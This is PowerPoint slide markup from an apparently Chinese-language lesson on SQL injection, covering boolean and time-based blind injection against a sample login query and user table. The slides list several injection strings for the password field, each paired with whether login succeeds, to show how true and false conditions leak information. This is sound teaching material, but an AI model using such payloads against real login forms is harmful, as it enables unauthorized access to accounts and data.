              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="852692" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>盲注</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6CB80A1-6941-4F73-A06E-949C3A0DA5FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627327" y="1676939"/>
            <a:ext cx="3503966" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>盲注的本质是猜解</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4AF2FB-48A9-47AE-B65E-0841FF9C8853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="785139" y="2214079"/>
            <a:ext cx="10932281" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>所谓 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>盲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t> 就是在你看不到返回数据的情况下能通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>差异</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>来判断</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>（包括</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>运行时间的差异</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>时间盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>页面返回结果的差异</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>布尔盲注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5911BB0-8FA5-479B-8228-466774F324E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="3448729"/>
            <a:ext cx="11128526" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>Select * from user where username='admin' and password=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="20" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B6B6F51-E530-4D82-8BA2-60B5ABF68B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1701573636"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7596315" y="4059754"/>
          <a:ext cx="4166695" cy="2315448"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="555505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3217910847"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="289602206"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1805595">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2781414587"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>username</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>passwd</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2334648633"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Admin</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2527666147"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>Bob</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>123</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="656364240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="578862">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>user1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
                        <a:t>pass1</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="112984" marR="112984" marT="56492" marB="56492"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831422024"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{001BAB7B-3870-48E0-ADDD-6E3C874B93B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="4081363"/>
            <a:ext cx="7054886" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=password '  and 'a' = 'a' # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>登录成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A454067-C0D4-412B-B9E5-DF5763F336F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="4559212"/>
            <a:ext cx="7054886" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=password '  and 'a' = 'b' # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>登录失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2243F49-4085-4793-B9F6-E0A7BF24A7B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="5278732"/>
            <a:ext cx="6471921" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=x '  or 'a' = 'a' # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>登录失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F140A39A-FF70-47B4-9269-6E64638E6078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="5785565"/>
            <a:ext cx="6315761" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
              </a:rPr>
              <a:t>=x '  or 'a' = 'b' # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="PingFangSC-Regular"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>登录失败</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="PingFangSC-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3457152463"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
